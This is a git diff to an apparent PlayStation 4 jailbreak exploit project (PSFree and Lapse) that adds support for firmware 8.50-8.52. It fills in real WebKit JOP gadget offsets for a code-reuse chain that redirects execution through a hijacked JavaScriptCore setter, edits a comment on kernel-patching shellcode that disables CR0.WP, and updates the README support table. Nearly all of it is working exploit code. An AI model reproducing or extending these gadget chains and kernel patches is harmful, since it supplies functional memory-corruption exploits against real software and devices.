diff --git a/CHANGELOG.md b/CHANGELOG.md index ac18a8f..f1b1784 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -15,6 +15,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), @janisslsm - Added loading payload from file - Added read8/read16/write8/write16 functions +- Added 8.50 and 8.52 support ### Fixed diff --git a/README.md b/README.md index ec3776d..f4b3b30 100644 --- a/README.md +++ b/README.md @@ -22,7 +22,7 @@ This table indicates firmware versions for which the *current version* of this r | | PSFree | Lapse | |:--------------|:----------|:-----------| -| PlayStation 4 | 8.00-8.03 | 8.00-8.03 | +| PlayStation 4 | 8.00-8.52 | 8.00-8.52 | | PlayStation 5 | N/A | N/A | *Note: Support for other firmwares listed in the "Vulnerability Scope" table may, or may not, be actively being worked on or may have been supported in previous versions of this repository. Please check `CHANGELOG.md` for historical support.* diff --git a/src/lapse.mjs b/src/lapse.mjs index 421f10f..75d6563 100644 --- a/src/lapse.mjs +++ b/src/lapse.mjs @@ -64,6 +64,8 @@ const [is_ps4, version] = (() => { throw RangeError(`invalid config.target: ${hex(value)}`); } + log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`); + return [is_ps4, version]; })(); @@ -1491,8 +1493,8 @@ async function get_binary(url) { } // Using JIT to load our own shellcode code here avoids the need to preform -// some trick toggle the CR0 Protection Mode bit. We can just toggle it easily -// within our shellcode. +// some trick toggle the CR0.WP bit. We can just toggle it easily within our +// shellcode. async function patch_kernel(kbase, kmem, p_ucred, restore_info) { if (!is_ps4) { throw RangeError("ps5 kernel patching unsupported"); diff --git a/src/psfree.mjs b/src/psfree.mjs index 84be2a1..8be9c30 100644 --- a/src/psfree.mjs +++ b/src/psfree.mjs @@ -60,6 +60,8 @@ const [is_ps4, version] = (() => { throw RangeError(`invalid config.target: ${hex(value)}`); } + log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`); + return [is_ps4, version]; })(); diff --git a/src/rop/ps4/800.mjs b/src/rop/ps4/800.mjs index 42c95e9..2b46c0d 100644 --- a/src/rop/ps4/800.mjs +++ b/src/rop/ps4/800.mjs @@ -61,7 +61,6 @@ call qword ptr [rax + 0x40] `; const jop4 = ` push rdx -mov edi, 0xac9784fe jmp qword ptr [rax] `; const jop5 = "pop rsp; ret"; @@ -112,7 +111,7 @@ const webkit_gadget_offsets = new Map( [jop1]: 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70` [jop2]: 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30` [jop3]: 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40` - [jop4]: 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20` + [jop4]: 0x0000000001ef0d16, // `52 ff 20` [jop5]: 0x00000000000bf669, // `5c c3` }), ); diff --git a/src/rop/ps4/850.mjs b/src/rop/ps4/850.mjs index e03617b..0606c2e 100644 --- a/src/rop/ps4/850.mjs +++ b/src/rop/ps4/850.mjs @@ -37,7 +37,7 @@ export let libkernel_base = null; // libSceLibcInternal.sprx export let libc_base = null; -// TODO: gadgets for the JOP chain +// gadgets for the JOP chain // // we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its // type is PutPropertySlot::PutValueFunc @@ -61,7 +61,6 @@ call qword ptr [rax + 0x40] `; const jop4 = ` push rdx -mov edi, 0xac9784fe jmp qword ptr [rax] `; const jop5 = "pop rsp; ret"; @@ -109,11 +108,11 @@ const webkit_gadget_offsets = new Map( "mov dword ptr [rdi], eax; ret": 0x0000000000008e7f, // `89 07 c3` "mov dword ptr [rax], esi; ret": 0x0000000000cf6c22, // `89 30 c3` - [jop1]: 0x0000000000000000, // `` - [jop2]: 0x0000000000000000, // `` - [jop3]: 0x0000000000000000, // `` - [jop4]: 0x0000000000000000, // `` - [jop5]: 0x0000000000000000, // `` + [jop1]: 0x00000000019881d0, // `48 8b 7e 08 48 8b 07 ff 60 70` + [jop2]: 0x00000000011c9df0, // `55 48 89 e5 48 8b 07 ff 50 30` + [jop3]: 0x000000000126c9c5, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40` + [jop4]: 0x00000000021f3a2e, // `52 ff 20` + [jop5]: 0x0000000000073c2b, // `5c c3` }), );